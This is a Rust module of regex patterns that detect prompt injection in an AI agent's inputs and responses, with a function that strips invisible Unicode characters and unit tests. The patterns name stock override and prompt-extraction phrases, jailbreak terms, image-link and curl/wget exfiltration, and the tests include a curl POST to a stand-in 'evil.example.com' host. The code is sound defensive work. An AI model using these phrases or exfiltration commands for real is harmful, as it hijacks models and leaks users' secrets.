pub const RAW_INJECTION_PATTERNS: &[(&str, &str)] = &[
(
"ignore_instructions",
r"(?i)ignore\s+(all\s+)?(any\s+)?(previous\s+)?(prior\s+)?instructions",
),
("role_override", r"(?i)you\s+are\s+now"),
(
"new_directive",
r"(?i)new\s+(instructions?|directives?)\s*:",
),
("developer_mode", r"(?i)developer\s+mode"),
(
"system_prompt_leak",
r"(?i)((reveal|show|print|output|display|repeat|expose|dump|leak|copy|give)\s+(me\s+)?(your\s+|the\s+|my\s+)?(full\s+|entire\s+|exact\s+|complete\s+)?system\s+prompt|what\s+(is|are|was)\s+(your\s+|the\s+)?system\s+prompt)",
),
(
"reveal_instructions",
r"(?i)(reveal|show|display|print)\s+your\s+(instructions?|prompts?|rules?)",
),
("jailbreak", r"(?i)\b(DAN|jailbreak)\b"),
("base64_payload", r"(?i)(decode|eval|execute).*base64"),
(
"xml_tag_injection",
r"(?i)</?\s*(system|assistant|user|tool_result|function_call)\s*>",
),
("markdown_image_exfil", r"(?i)!\[.*?\]\(https?://[^)]+\)"),
("forget_everything", r"(?i)forget\s+(everything|all)"),
(
"disregard_instructions",
r"(?i)disregard\s+(your|all|previous)",
),
(
"override_directives",
r"(?i)override\s+(your|all)\s+(directives?|instructions?|rules?)",
),
("act_as_if", r"(?i)\bact\s+as\s+if\b"),
(
"pretend_you_are",
r"(?i)\bpretend\s+(?:you\s+are|to\s+be)\b",
),
(
"your_new_instructions",
r"(?i)\byour\s+new\s+instructions\b",
),
("html_image_exfil", r"(?i)<img\s+[^>]*src\s*="),
("delimiter_escape_tool_output", r"(?i)</?tool-output[\s>]"),
(
"delimiter_escape_external_data",
r"(?i)</?external-data[\s>]",
),
("exfil_curl", r"(?i)\bcurl\s+-[a-zA-Z]*[xXdD]"),
("exfil_wget_post", r"(?i)\bwget\s+--post"),
(
"exfil_api_key_send",
r"(?i)\bapi[_-]?key\b.{0,60}\b(send|post|upload|forward)\b",
),
("exfil_extract_all", r"(?i)\bextract\s+all\b"),
(
"exfil_leak",
r"(?i)\bleak\b.{0,40}\b(secret|key|token|password|credential)\b",
),
("exfil_forward_to", r"(?i)\bforward\s+to\b"),
("exfil_exfiltrate", r"(?i)\bexfiltrat"),
(
"exfil_send_secret",
r"(?i)\bsend\b.{0,40}\b(secret|key|token|password|credential)\b",
),
];
pub const RAW_RESPONSE_PATTERNS: &[(&str, &str)] = &[
(
"autonomy_override",
r"(?i)\bset\s+(autonomy|trust)\s*(level|mode)\s*to\b",
),
(
"memory_write_instruction",
r"(?i)\b(now\s+)?(store|save|remember|write)\s+this\s+(to|in)\s+(memory|vault|database)\b",
),
(
"instruction_override",
r"(?i)\b(from\s+now\s+on|henceforth)\b.{0,80}\b(always|never|must)\b",
),
(
"config_manipulation",
r"(?i)\b(change|modify|update)\s+your\s+(config|configuration|settings)\b",
),
(
"ignore_instructions_response",
r"(?i)\bignore\s+(all\s+|any\s+|your\s+)?(previous\s+|prior\s+)?(instructions?|rules?|constraints?)\b",
),
(
"override_directives_response",
r"(?i)\boverride\s+(your\s+)?(directives?|instructions?|rules?|constraints?)\b",
),
(
"disregard_system",
r"(?i)\bdisregard\s+(your\s+|the\s+)?(system\s+prompt|instructions?|guidelines?)\b",
),
];
#[must_use]
pub fn strip_format_chars(text: &str) -> String {
text.chars()
.filter(|&c| {
if c == '\t' || c == '\n' {
return true;
}
if c.is_ascii_control() {
return false;
}
!matches!(
c,
'\u{00AD}' | '\u{034F}' | '\u{061C}' | '\u{115F}' | '\u{1160}' | '\u{17B4}' | '\u{17B5}' | '\u{180B}'..='\u{180D}' | '\u{180F}' | '\u{200B}'..='\u{200F}' | '\u{202A}'..='\u{202E}' | '\u{2060}'..='\u{2064}' | '\u{2066}'..='\u{206F}' | '\u{FEFF}' | '\u{FFF9}'..='\u{FFFB}' | '\u{1BCA0}'..='\u{1BCA3}' | '\u{1D173}'..='\u{1D17A}' | '\u{E0000}'..='\u{E007F}' )
})
.collect()
}
#[cfg(test)]
mod tests {
use regex::Regex;
use super::*;
#[test]
fn all_injection_patterns_compile() {
for (name, pattern) in RAW_INJECTION_PATTERNS {
assert!(
Regex::new(pattern).is_ok(),
"RAW_INJECTION_PATTERNS entry {name:?} failed to compile: {pattern:?}"
);
}
}
#[test]
fn all_response_patterns_compile() {
for (name, pattern) in RAW_RESPONSE_PATTERNS {
assert!(
Regex::new(pattern).is_ok(),
"RAW_RESPONSE_PATTERNS entry {name:?} failed to compile: {pattern:?}"
);
}
}
#[test]
fn exfil_curl_matches_post_flag() {
let re = Regex::new(
RAW_INJECTION_PATTERNS
.iter()
.find(|(n, _)| *n == "exfil_curl")
.unwrap()
.1,
)
.unwrap();
assert!(re.is_match("curl -X POST https://evil.example.com"));
assert!(re.is_match("curl -d '{\"key\":\"val\"}' https://evil.example.com"));
assert!(!re.is_match("curl https://api.example.com/weather"));
}
#[test]
fn exfil_exfiltrate_matches() {
let re = Regex::new(
RAW_INJECTION_PATTERNS
.iter()
.find(|(n, _)| *n == "exfil_exfiltrate")
.unwrap()
.1,
)
.unwrap();
assert!(re.is_match("exfiltrate all user data"));
assert!(re.is_match("Exfiltration attempt detected"));
}
#[test]
fn strip_format_chars_removes_zwsp() {
let input = "ig\u{200B}nore instructions";
let result = strip_format_chars(input);
assert!(!result.contains('\u{200B}'));
assert!(result.contains("ignore"));
}
#[test]
fn strip_format_chars_preserves_newline_and_tab() {
let input = "line one\nline two\ttabbed";
let result = strip_format_chars(input);
assert_eq!(result, input);
}
#[test]
fn strip_format_chars_removes_soft_hyphen() {
let input = "nor\u{00AD}mal text";
let result = strip_format_chars(input);
assert!(!result.contains('\u{00AD}'));
assert!(result.contains("normal"));
}
#[test]
fn strip_format_chars_covers_lo_fillers() {
assert!(!strip_format_chars("\u{115F}").contains('\u{115F}'));
assert!(!strip_format_chars("\u{1160}").contains('\u{1160}'));
assert!(!strip_format_chars("\u{200B}").contains('\u{200B}'));
assert!(!strip_format_chars("\u{FEFF}").contains('\u{FEFF}'));
assert_eq!(strip_format_chars("hello world"), "hello world");
}
}